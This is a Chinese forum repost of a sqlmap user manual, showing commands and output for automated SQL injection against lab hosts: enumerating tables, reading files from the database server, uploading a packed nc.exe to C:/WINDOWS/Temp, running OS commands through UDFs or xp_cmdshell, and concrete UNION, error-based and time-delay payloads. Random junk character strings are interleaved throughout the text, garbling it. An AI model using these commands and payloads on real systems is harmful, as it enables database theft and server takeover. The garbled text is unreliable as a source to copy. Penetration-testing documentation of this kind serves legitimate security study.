标题: sqlmap中文手册 [打印本页] 作者: admin 时间: 2017-9-8 09:05 标题: sqlmap中文手册 http://192.168.136.131/sqlmap/mysql/get_int.php?id=1/ N7 A, v' Q: j& ^
, {5 ^4 ?3 v4 D2 {
当给sqlmap这么一个url的时候,它会: a9 c0 b$ s: h# s % i3 \& F2 R" g2 N z1 j) S7 Z1、判断可注入的参数 5 a8 ^; J/ A: o4 `4 W) g/ K6 C# ^" V* K+ l8 k; A
2、判断可以用那种SQL注入技术来注入7 z2 x Q9 P4 ]& W1 F _* p# V& O
+ l3 m n/ j# B4 h" B" f
3、识别出哪种数据库. C( g% K2 r' t" S* j& W4 K$ C
' f( ~& W. f9 ]. `4、根据用户选择,读取哪些数据 - N# Z* ^2 a+ y7 u8 Z+ z$ i4 x( x3 O" v6 R1 g& c: F) N. F
sqlmap支持五种不同的注入模式: , U( L8 C( C- n+ N% I0 c( N1 L7 p1 ? ; s4 v$ J6 P6 b6 n$ r1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 1 m; ~" m3 q0 H9 W# y, c 4 w. e0 m9 x8 t+ q; s* C2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 / S5 W& l( w8 I2 v; k% T" d) g1 c0 R+ ^( w
3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。" _. N, ]* ?8 d3 v
7 t5 v0 s9 k' D( k# D* X5 ], H
4、联合查询注入,可以使用union的情况下的注入。 4 A. p1 r, |+ [' e% |+ q# f f, a4 C, j: Q, W! H) N. P, Y5 u
5、堆查询注入,可以同时执行多条语句的执行时的注入。7 M/ C0 T! I4 g$ c& ~- W
! |9 v8 U8 u# R6 bsqlmap支持的数据库有: 6 _7 x) c8 D- [$ g % B% U6 r6 Z. V$ s0 \6 QMySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB9 J; c5 X$ Z2 q! u2 n
7 E, z) _9 [8 A3 ]
可以提供一个简单的URL,Burp或WebScarab请求日志文件,文本文档中的完整http请求或者Google的搜索,匹配出结果页面,也可以自己定义一个正则来判断那个地址去测试。# S X9 G" H& d! B. h. j6 W
5 G2 T: {8 R2 [' R( W测试GET参数,POST参数,HTTP Cookie参数,HTTP User-Agent头和HTTP Referer头来确认是否有SQL注入,它也可以指定用逗号分隔的列表的具体参数来测试。 4 Y. O& n9 O& G% W \7 Q4 Q5 m$ v9 O$ O' B- T2 [' P
可以设定HTTP(S)请求的并发数,来提高盲注时的效率。 ) G! v) \; {5 P5 s9 x2 q* I) v$ _$ c4 I q2 l, L/ h6 _
Youtube上有人做的使用sqlmap的视频:% p9 {/ f1 c. M; s7 h
9 O3 R0 w! i1 c" {3 }$ [
http://www.youtube.com/user/inquisb/videos. t, c0 `1 c; y1 c
v7 D+ l# c' ]+ phttp://www.youtube.com/user/stamparm/videos 5 w# ` Z1 r% s- R / A, d. w7 J, X使用sqlmap的实例文章:: A, B5 a- F( a; Y& t& U
4 s: }- b! S R- J9 b7 i. shttp://unconciousmind.blogspot.com/search/label/sqlmap9 E/ N* b! O2 {+ }3 M
/ U& ^8 I1 ~! w+ B; |) w. ]可以点击https://github.com/sqlmapproject/sqlmap/tarball/master下载最新版本sqlmap。' H; T4 n% e7 u4 O7 ^
7 }/ m+ f; J# `! }$ S) O
也可以使用git来获取sqlmap 0 y. O5 a8 ]1 R4 R K- p ' I G6 p" q3 @' c( ?' k8 q$ j: @& agit clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev5 v% D- b0 {6 R/ V# W2 h
7 `4 f' |( i* v+ w4 P列举一个MySQL 4.1的例子: : B/ o5 F/ J, {4 g- _& D; P! v5 m0 t3 }. Z% W0 C& C& U! K
$ python sqlmap.py -u "http://192.168.136.129/mysql/get_int_4.php?id=1" --common-tables -D testdb --banner " R$ }" S$ E E) F* K% T8 T# u8 l) K2 @: S+ M
[...] - o) P6 \: \6 f8 Z7 G[hh:mm:39] [INFO] testing MySQL5 @4 E4 E5 M r& S: M) C* ^
[hh:mm:39] [INFO] confirming MySQL . i) P8 t- C7 n' d[hh:mm:40] [INFO] the back-end DBMS is MySQL ( k, f' w. u' [$ j8 r' V) g[hh:mm:40] [INFO] fetching banner X- O( g* x3 h# e9 _ j
web server operating system: Windows & Y- U' Y) p# U# Y& u L" N: Nweb application technology: PHP 5.3.1, Apache 2.2.144 Y- a6 y) `4 U4 |3 c! u
back-end DBMS operating system: Windows5 u4 O- W' q5 H9 {, |8 x3 E0 g
back-end DBMS: MySQL < 5.0.0/ O W9 H x) C7 S; N Z& [, H$ ?
banner: '4.1.21-community-nt' * R4 {' b# C: _$ J$ M. x5 c/ l! m) J0 d& P& _
[hh:mm:40] [INFO] checking table existence using items from '/software/sqlmap/txt/common-tables.txt'! L, _6 U; v0 K1 P4 Q2 H y
[hh:mm:40] [INFO] adding words used on web page to the check list ; Y9 }! y* @- C3 h* @please enter number of threads? [Enter for 1 (current)] 8 7 k* M. X- D1 P3 I4 }9 n8 X4 {[hh:mm:43] [INFO] retrieved: users( W& U, F: V8 s1 ?' X; U4 n
( ?' v/ [9 o2 ?& D0 z: rDatabase: testdb 2 x2 ]" K, J# ?5 V5 r+ ~[1 table]+ p0 O0 v2 W- T
+-------+ 0 t: H% q5 f- k, e+ e0 T3 U| users | ' E' T0 m( ^) A6 h- H4 [9 _2 R# w+-------+/ t' t3 z3 E1 ^) a" h0 J, n
* u& i& M6 \" c% r
暴力破解列名1 S) c+ F( A2 C
+ C" O9 C, {7 f
参数:--common-columns 8 P: [3 }' Y" [( f0 C7 I4 ~3 R" |5 |
与暴力破解表名一样,暴力跑的列名在txt/common-columns.txt中。: ~4 ^2 v: p( Y3 @+ D; i) \. n
用户自定义函数注入 $ ^7 v7 e1 n |: Y2 ]4 s4 e, `% W& t8 U% H. U H! X
参数:--udf-inject,--shared-lib 1 ?6 I; }+ M3 M( A) X: r( v: P) r# P) ^
你可以通过编译MySQL注入你自定义的函数(UDFs)或PostgreSQL在windows中共享库,DLL,或者Linux/Unix中共享对象,sqlmap将会问你一些问题,上传到服务器数据库自定义函数,然后根据你的选择执行他们,当你注入完成后,sqlmap将会移除它们。$ u/ s# Q" R. t l# F
系统文件操作 - H4 r% ~ e: K1 r, a6 I从数据库服务器中读取文件: y; x0 Y2 [! C, m5 ]
6 w! d1 a( k5 o; h. ^参数:--file-read. g1 Y/ F# F# a8 G
1 Q4 h% W+ T, y% E2 h当数据库为MySQL,PostgreSQL或Microsoft SQL Server,并且当前用户有权限使用特定的函数。读取的文件可以是文本也可以是二进制文件。; M0 t: R4 u7 U
& h, |5 R. l8 q2 E& ]: E9 A
列举一个Microsoft SQL Server 2005的例子:: B) r2 }& B6 X# h8 d; y( H
2 N; Q# t/ I) ~2 Z) W" d$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?name=luther" \: d" ^% A: G; \# @
--file-read "C:/example.exe" -v 15 y4 c: n; j1 B* f/ O2 k
2 O$ a- p3 ~6 e# W
[...]- n; V( Z! y: }4 z8 ~$ n
[hh:mm:49] [INFO] the back-end DBMS is Microsoft SQL Server& z# q1 C" F/ N; ` p/ }' B
web server operating system: Windows 2000+ L j% V* v. w3 @+ @) `/ I' ?6 }
web application technology: ASP.NET, Microsoft IIS 6.0, ASP 6 P" {! u8 B' }( S3 cback-end DBMS: Microsoft SQL Server 2005 , ~9 Z/ ]1 f+ x& Y7 M4 g) `9 f* E, L1 L" ~
[hh:mm:50] [INFO] fetching file: 'C:/example.exe' 6 N& W! ` d* A! `6 x2 E- b[hh:mm:50] [INFO] the SQL query provided returns 3 entries 4 a4 F e! q- e( L! b7 V2 KC:/example.exe file saved to: '/software/sqlmap/output/192.168.136.129/files/C__example.exe' ) U% a4 [+ i$ c7 \. P: ?[...]$ I: V i+ c, d" s$ {+ \
" B6 ?5 \5 j+ J0 I
$ ls -l output/192.168.136.129/files/C__example.exe & m9 E: j+ @6 j- y-rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.129/files/C__example.exe $ U/ S q1 b; p' J2 e1 r R8 t ^+ R' @/ ]; N
$ file output/192.168.136.129/files/C__example.exe , `6 [! N, k" J# h% h, Routput/192.168.136.129/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel 3 y8 \; X- q! v. Z5 j+ I80386 32-bit( e2 ]/ t1 E/ m" C
0 V. `# m5 o9 d% h, C+ r* V+ I
把文件上传到数据库服务器中 + g& T9 V$ @2 i: X9 I! q 7 g) L5 e0 i \: e" g# H5 H参数:--file-write,--file-dest 7 |5 e: g R# {! N: b/ q# p# C8 z% q/ Q4 j
当数据库为MySQL,PostgreSQL或Microsoft SQL Server,并且当前用户有权限使用特定的函数。上传的文件可以是文本也可以是二进制文件。 % V( C" t6 P$ ^6 ~, Q. Q% d4 U % g( S0 `! {: {+ |" m4 Y列举一个MySQL的例子: 0 @ x. [1 r8 H6 K0 q6 T3 J) O; y, G: A' N) a7 ]7 S
$ file /software/nc.exe.packed 8 o$ T) p! W. B s- x5 ]
/software/nc.exe.packed: PE32 executable for MS Windows (console) Intel 80386 32-bit. I; `1 r* {5 A& X7 V5 t
, g% l+ X9 u( ]0 _1 T
$ ls -l /software/nc.exe.packed: A( B: G3 \/ G
-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /software/nc.exe.packed 5 Q; u0 Q7 u7 s5 \ k. A; ~! }8 u$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1" --file-write \8 J* d5 b% F/ b3 b- H5 Z
"/software/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 19 Y8 q8 V2 a; Q9 ~$ u; P7 p+ r0 ?
9 Y( I% q1 x+ h[...] 6 u8 l6 d# D* X/ l8 A[hh:mm:29] [INFO] the back-end DBMS is MySQL% E& u5 `* z( k+ f& P' d: G
web server operating system: Windows 2003 or 2008. P6 o4 c+ X) p
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.507278 ~% ]# Y7 D0 J% {9 [4 w7 U
back-end DBMS: MySQL >= 5.0.0 , j% c/ M a$ ?: X# \1 q& L- ]& g & _" x3 C) s7 z6 E- K2 f1 `[...] 9 |1 ~" k% G: o5 L9 @8 Fdo you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been successfully - D( G' I( e; H4 Z+ n
written on the back-end DBMS file system? [Y/n] y1 R, x! X5 Z$ T" h, F6 }
[hh:mm:52] [INFO] retrieved: 31744& a: |! ?# }: E1 d# d6 z: M- v
[hh:mm:52] [INFO] the file has been successfully written and its size is 31744 bytes, . ~) A+ m- Z8 d# q
same size as the local file '/software/nc.exe.packed' - t9 X( C/ Y' p/ w 6 }7 e% x5 q @6 W1 E1 E, @+ N运行任意操作系统命令9 p- E8 x: y) ~7 N# G# Q
; o; ]1 @3 y& k8 q9 V% Y
参数:--os-cmd,--os-shell / D# S/ u, z/ f. }$ _( T, z9 m( x+ e, f0 H4 b7 M8 y3 R+ M
当数据库为MySQL,PostgreSQL或Microsoft SQL Server,并且当前用户有权限使用特定的函数。8 c- y% o) N p L0 V9 _* n6 Y
9 r' ^- ]% i% L( t1 ^+ [1 r在MySQL、PostgreSQL,sqlmap上传一个二进制库,包含用户自定义的函数,sys_exec()和sys_eval()。( E, ~6 y) }( R, X
: b+ ` [* p* P' L那么他创建的这两个函数可以执行系统命令。在Microsoft SQL Server,sqlmap将会使用xp_cmdshell存储过程,如果被禁(在Microsoft SQL Server 2005及以上版本默认禁制),sqlmap会重新启用它,如果不存在,会自动创建。 & T7 ^- B5 W0 i% U3 S+ ~$ ~9 d; }, d4 B5 p, p! r
列举一个PostgreSQL的例子: 6 q" K r/ M4 R : u/ J9 g" r0 g) p; v$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" \& _$ n; P, ]1 C: [" ]- o
--os-cmd id -v 1 ; o3 `. D9 L: [9 _4 c/ b * d+ b9 M3 T; k7 f[...] " n$ N5 \, N f+ `' r$ M# e: Kweb application technology: PHP 5.2.6, Apache 2.2.9/ R# z7 o+ {( S* f8 g, L* Y, a
back-end DBMS: PostgreSQL% l# {. W0 Q1 \3 x2 \7 {9 h
[hh:mm:12] [INFO] fingerprinting the back-end DBMS operating system* m# m6 Q S& ~7 Q
[hh:mm:12] [INFO] the back-end DBMS operating system is Linux& F& W7 @0 _) G4 I! M7 L
[hh:mm:12] [INFO] testing if current user is DBA7 s# @" r, k0 l# s) d% c
[hh:mm:12] [INFO] detecting back-end DBMS version from its banner7 W8 u* O0 A$ |
[hh:mm:12] [INFO] checking if UDF 'sys_eval' already exist7 ~$ m- i2 N6 x1 p
[hh:mm:12] [INFO] checking if UDF 'sys_exec' already exist ' z- {2 j9 e, ?' m. n1 @/ Q, x. i[hh:mm:12] [INFO] creating UDF 'sys_eval' from the binary UDF file2 e0 Q, j/ q& N- K/ O
[hh:mm:12] [INFO] creating UDF 'sys_exec' from the binary UDF file # @% [3 n5 U$ K; }8 G2 Udo you want to retrieve the command standard output? [Y/n/a] y ' [" R; m t1 B5 H9 m( _command standard output: 'uid=104(postgres) gid=106(postgres) groups=106(postgres)'- A$ Q5 f! P C
! I) h9 w+ O4 U[hh:mm:19] [INFO] cleaning up the database management system9 U7 ~$ C6 l7 ]% h$ z" {' K2 N) P
do you want to remove UDF 'sys_eval'? [Y/n] y 0 M9 d. T; ~7 z$ _do you want to remove UDF 'sys_exec'? [Y/n] y . Q# o0 e1 l5 X[hh:mm:23] [INFO] database management system cleanup finished! N+ {6 X; _' `/ }
[hh:mm:23] [WARNING] remember that UDF shared object files saved on the file system can 3 }/ Z: u# v M' Jonly be deleted manually ; x1 N- I ^6 s+ m0 E+ e3 l( P- D0 @, H/ m6 X- `3 R) J& f
用--os-shell参数也可以模拟一个真实的shell,可以输入你想执行的命令。 {3 R: g4 z* ]/ e+ o* e
! g* w/ X2 k, a" \4 l |( u6 q. w$ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --parse-errors . L2 _2 G$ ^0 {4 n- V' b' z[...] * P9 i9 b+ E$ D3 Q" R0 s[11:12:17] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test - ]/ N9 O) c, Z* U9 A8 ~" W[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)4 P3 F/ k2 }1 ^. R1 b1 }+ L0 L
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 10 is out of range of the number of items in the select list. # b$ W0 t+ j5 Q. R$ L# P<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>' # j0 z/ H5 T- x2 E[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) * U& F# w$ }2 O[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 6 is out of range of the number of items in the select list. - j! l1 ~" Z' f5 A v, n<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>' 7 \7 v5 E x; Z6 [[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) + n4 }! `4 }" P3 X[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 4 is out of range of the number of items in the select list./ ]5 L- r! T4 s) P4 m5 Y+ z
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'' @( \6 J; [/ n" I* [* e0 U. G9 Z
[11:12:17] [INFO] target URL appears to have 3 columns in query " {' N! ?1 n0 ~) R" j1 [8 _[...] 2 L1 z8 J. a- O; s) e. ~8 ^- G# N+ X F# o7 U4 g& \$ ~# D) ?+ a
其他的一些参数; F' M% H) F3 @: x& P/ m
使用参数缩写 0 [9 Y+ }7 z. y0 W9 H. o! W ! u) ^; b3 Y0 h" A# v! K( o7 M! T参数:-z4 i' i( [) K+ I( |; {/ b* u Y
: z, m) {( J: f! |
有使用参数太长太复杂,可以使用缩写模式。 例如: 9 {' j% P7 A, K1 ?: X+ M3 u9 ^; }5 C' k* ]
python sqlmap.py --batch --random-agent --ignore-proxy --technique=BEU -u "www.target.com/vuln.php?id=1" : a8 E, \9 v& ~ Y- e F% o1 o
& w1 t8 [8 D# m0 A可以写成:* d% U* [9 S) z7 C) U! u. U
t0 K. h6 F0 `# `6 R6 x! U
python sqlmap.py -z "bat,randoma,ign,tec=BEU" -u "www.target.com/vuln.php?id=1" - F2 D; n9 j% s. J+ X; o # v5 R& i: d9 Z! J( E9 g还有: 6 K4 v. X$ d% A/ {* U: a0 B6 y6 U; |: @9 T$ ~+ j9 y- b
python sqlmap.py --ignore-proxy --flush-session --technique=U --dump -D testdb -T users -u "www.target.com/vuln.php?id=1" # Y9 p4 H9 c) i. X7 Q Y m& p9 Y. \$ ^0 z* P; S可以写成:8 k/ g: H; b5 g$ ?
' I2 b- H5 t4 E$ python sqlmap.py -u "http://192.168.22.128/sqlmap/mysql/get_int.php?id=1"--technique=E --answers="extending=N" --batch4 w1 q: o& o. i7 K) F4 T( f
[...] ; U, G( Z( B2 A3 T8 |, G9 ][xx:xx:56] [INFO] testing for SQL injection on GET parameter 'id'5 d% V, g8 V0 S5 P
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y' X/ a/ Y& E: C$ z& i6 m7 W
[xx:xx:56] [INFO] do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] N9 M% @* o9 B7 i0 H }' f+ d
[...] 0 P) m- I" K( ?* E( m: g8 z8 b# y# s* I2 \) Q
发现SQL注入时发出蜂鸣声" S/ k6 E' j# P$ i; T$ k5 P
% i. l/ \& z/ a7 C/ u: [' R例如: X% I9 S- i. W3 f2 b% j6 K8 J
t- g8 L' c# ^% u1 X
$ python sqlmap.py --purge-output -v 3' M' m! u3 C% ?
[...] . _4 K) Z% i8 F. m[xx:xx:55] [INFO] purging content of directory '/home/user/sqlmap/output'...2 z' D- E4 w5 @
[xx:xx:55] [DEBUG] changing file attributes 5 M& W9 e9 \4 p[xx:xx:55] [DEBUG] writing random data to files 9 a/ p5 n$ c) B a[xx:xx:55] [DEBUG] truncating files 5 Y3 N% [( U9 Y[xx:xx:55] [DEBUG] renaming filenames to random values9 h' \5 S9 Z4 E q+ e; S0 ^
[xx:xx:55] [DEBUG] renaming directory names to random values s8 H2 y# ~/ `" C* z, a/ i8 I
[xx:xx:55] [DEBUG] deleting the whole directory tree 7 A. Z1 K+ J* y" d! b+ U4 U[...]7 l, E% M$ R& W1 w
% I. A1 P1 h& T7 r启发式判断注入1 s! Y. ?" F* W. h1 N1 J& E' Z
! a! ~: \! I3 ] B9 ^2 _9 q
参数:--smart 6 M- A) w1 H, V( b& m9 I% K1 ~. [& }/ p
有时对目标非常多的URL进行测试,为节省时间,只对能够快速判断为注入的报错点进行注入,可以使用此参数。 % K, M: p2 o5 X6 q8 X& f2 M2 }6 }! v! t2 m! |/ Q6 [0 z
例子: - _% @; `7 K$ @4 F& c3 K1 o ' A5 ^8 m6 k2 P2 ^% J( ]$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&user=foo&id=1" --batch --smart 9 c. \3 C7 e; ?* I, I[...]% m) {8 L" A7 q& w; V, L a
[xx:xx:14] [INFO] testing if GET parameter 'ca' is dynamic 1 E; D/ Q" \' U8 J7 J: }[xx:xx:14] [WARNING] GET parameter 'ca' does not appear dynamic5 d6 q7 d: B$ q9 _% J3 H, r5 \
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might not be injectable ; N& o% {0 @, r[xx:xx:14] [INFO] skipping GET parameter 'ca'. `( n( Y5 C$ [" s8 d! G- |
[xx:xx:14] [INFO] testing if GET parameter 'user' is dynamic k1 r6 u( |/ ~# F) R8 {[xx:xx:14] [WARNING] GET parameter 'user' does not appear dynamic ], Z d, G8 ~2 q
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' might not be injectable4 u M4 P# ^. ~
[xx:xx:14] [INFO] skipping GET parameter 'user'% a9 ]+ ~$ `5 C {. k
[xx:xx:14] [INFO] testing if GET parameter 'id' is dynamic0 p+ C4 b- g" C/ i) P3 @! ?
[xx:xx:14] [INFO] confirming that GET parameter 'id' is dynamic 8 ?+ x# g! f2 c4 k[xx:xx:14] [INFO] GET parameter 'id' is dynamic3 \. p1 [! g' M! E4 q- ]( t5 \
[xx:xx:14] [WARNING] reflective value(s) found and filtering out- X4 |6 o* p% B# J% H* v
[xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL') 3 w. G- |- P* Q8 T* D0 R" _3 C% q1 C[xx:xx:14] [INFO] testing for SQL injection on GET parameter 'id'# v# O. h+ x4 `7 N* ]" G
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y; R$ q c Z$ E$ ]8 X$ M
do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] Y * \0 [* c: \* y6 H3 I/ z# N$ Y[xx:xx:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'# ]! c. B* Y2 n% L
[xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable " L. x6 e$ h% {. ~# O2 Q! B4 R5 w[xx:xx:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'; v, m! I. t& _
[xx:xx:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable 7 F% ` ~. ]8 p" [ ]8 I7 A3 A[xx:xx:14] [INFO] testing 'MySQL inline queries' % S+ G! |: D% s$ i, R9 i! r[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'# j) k- G- J: n+ g! a8 R6 Q
[xx:xx:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' * [$ h, r& a: X1 t2 E; l" @5 ~[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind') r* l ? {+ m7 j2 _; D; {% n; x
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable - E/ ] h: V7 O7 G, z! |
[xx:xx:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns' $ a4 ^' E/ O/ I2 Z: A[xx:xx:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found 1 |" ~$ z0 Z; Y; ~2 s[xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test# Z$ T& M9 ^8 F- @0 f
[xx:xx:24] [INFO] target URL appears to have 3 columns in query , g9 N8 G$ n& E* p7 F \( _9 l( f[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable- s E3 ?$ _) X# r y0 p1 Y9 M
[...]$ }" A. v7 m; ^9 K! ]1 i0 i
: O5 i! M. O& j8 K" h* w& t* p6 M
初级用户向导参数! R0 d7 g4 L4 T# w$ t
2 d4 d/ x" e8 H/ W
参数:--wizard 面向初级用户的参数,可以一步一步教你如何输入针对目标注入。' R0 n7 x3 |6 L
. g5 T& H2 |" `8 F$ python sqlmap.py --wizard7 r9 G: d6 O* Z5 o' g4 c
9 d- i: l4 s- t% ^* z. [# ?+ q sqlmap/1.0-dev-2defc30 - automatic SQL injection and database takeover tool, Y* C; N- P" }6 Q8 Z- q+ I& c
7 r1 G' L& P; N+ Z" o1 ?
http://sqlmap.org5 Y B/ s' E7 T- [& g# a
& q, O$ ]+ p- ~9 V! k! v
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program; X" E; [5 r* G1 e$ r5 E4 F
starting at 11:25:26 4 Z& _% `4 F1 v' i( O2 n! {5 z# }: {/ N+ r& Q. \& `/ O5 g
Please enter full target URL (-u): http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1; L/ A6 f1 c* v/ r( \
POST data (--data) [Enter for None]: / r0 m4 a8 r7 d5 \Injection difficulty (--level/--risk). Please choose: , D4 a4 y4 ^! G. f" y ^[1] Normal (default)2 x! i' N: @2 c E$ @
[2] Medium0 Y" k$ v, t. A- D1 U
[3] Hard , V8 p' m! q; n E> 1 K& r0 T+ I: }, dEnumeration (--banner/--current-user/etc). Please choose:0 h! U" s7 u5 W4 R5 f
[1] Basic (default)1 Y& c4 S# L. X1 {1 A2 O0 u
[2] Smart 8 ]+ k. f; S$ e: p/ u[3] All! S+ s) _# a# ^
> 10 D% c! J; }5 b( ]# W
, g) ^1 M1 [" N/ I# V* Z% ]: l- c5 Y
sqlmap is running, please wait../ w/ C2 B K8 d/ J
6 @: e' E" E( a% ?5 w( p% g) Uheuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y y, P* G( r- Y; P Z) ldo you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1)? [Y/n] Y l# k3 L' F6 Q/ W( i
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N 1 ]4 p' n0 o; m Y6 U/ r2 F: [sqlmap identified the following injection points with a total of 25 HTTP(s) requests: - D+ }! O6 L( n0 G--- * t4 W! `# w' G) @# d: m vPlace: GET 0 B' a; U0 N5 N; KParameter: id% }3 C; I* o! p% P( q9 y1 }7 ]! W
Type: boolean-based blind ' ~, r3 v+ K7 R" u Title: AND boolean-based blind - WHERE or HAVING clause % B( a& }6 X9 R7 W! S4 f Payload: id=1 AND 2986=2986. X& K$ H* [5 x* f- s& T* b: ]
, N- C' ]9 A1 Y# w4 o9 q4 w
Type: error-based ) e! `- ?8 J0 f5 \0 A. j2 f Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause $ {. g# z; N9 d K; l Payload: id=1 AND 4847=CONVERT(INT,(CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN (4847=4847) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)))6 R# U3 ^" |* c, X
( L5 s2 K+ o$ h$ G' O' u# R G3 H Type: UNION query M* @# C* e8 {
Title: Generic UNION query (NULL) - 3 columns ' N6 o9 J4 y/ m9 t! p5 {/ n: a/ S Payload: id=1 UNION ALL SELECT NULL,NULL,CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) CHAR(70) CHAR(79) CHAR(118) CHAR(106) CHAR(87) CHAR(101) CHAR(119) CHAR(115) CHAR(114) CHAR(77) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)-- * v' x3 W; E' \
- }7 H( O3 E( R8 ]' l' n
Type: stacked queries 3 E5 o/ h. l. V$ z- U4 u Title: Microsoft SQL Server/Sybase stacked queries- j/ \9 o O1 q5 c+ t
Payload: id=1; WAITFOR DELAY '0:0:5'--; n1 Q$ `9 B) W+ p" @* b
( n e2 P3 A, @
Type: AND/OR time-based blind $ x! O3 |" w& h0 X. f/ d Title: Microsoft SQL Server/Sybase time-based blind1 _6 Y: b; x' c: m3 H4 S
Payload: id=1 WAITFOR DELAY '0:0:5'-- 3 J3 E: Q& I! @ R7 l+ {/ J$ }1 ~* n' C) |8 }" l
Type: inline query$ {" y/ B' P0 t* p5 Z, O
Title: Microsoft SQL Server/Sybase inline queries # A0 ^9 {0 Y$ V; c9 Z. ~& @7 e z Payload: id=(SELECT CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN (6382=6382) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58))9 Q$ @! n9 J' C" q# Q |
--- * Z4 ~8 P0 {3 q* I4 ~, s$ wweb server operating system: Windows XP! S6 U5 {* k- ]# x2 R3 t
web application technology: ASP, Microsoft IIS 5.1 & N$ W& J. v5 U- Qback-end DBMS operating system: Windows XP Service Pack 2 6 |8 h# [: A; B4 Fback-end DBMS: Microsoft SQL Server 2005 / s2 r0 ]7 c2 Bbanner: j1 P: n! U" o/ V" ?" r--- & k- A+ V R. s9 |9 H mMicrosoft SQL Server 2005 - 9.00.1399.06 (Intel X86) 9 X: ~) Q: r' G* n, J6 [ Oct 14 2005 00:33:37 / {1 q2 f F4 g2 g6 e8 u. F
Copyright (c) 1988-2005 Microsoft Corporation 3 Q1 R" H* e) @. q% c Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2) 4 t7 x5 [ ?! ]# r, x+ T! p5 A--- 2 C1 S" b x3 z/ L$ h6 jcurrent user: 'sa'5 c6 O5 r$ Q4 \3 U
current database: 'testdb'0 \( G9 h) P# f- s$ w
current user is DBA: True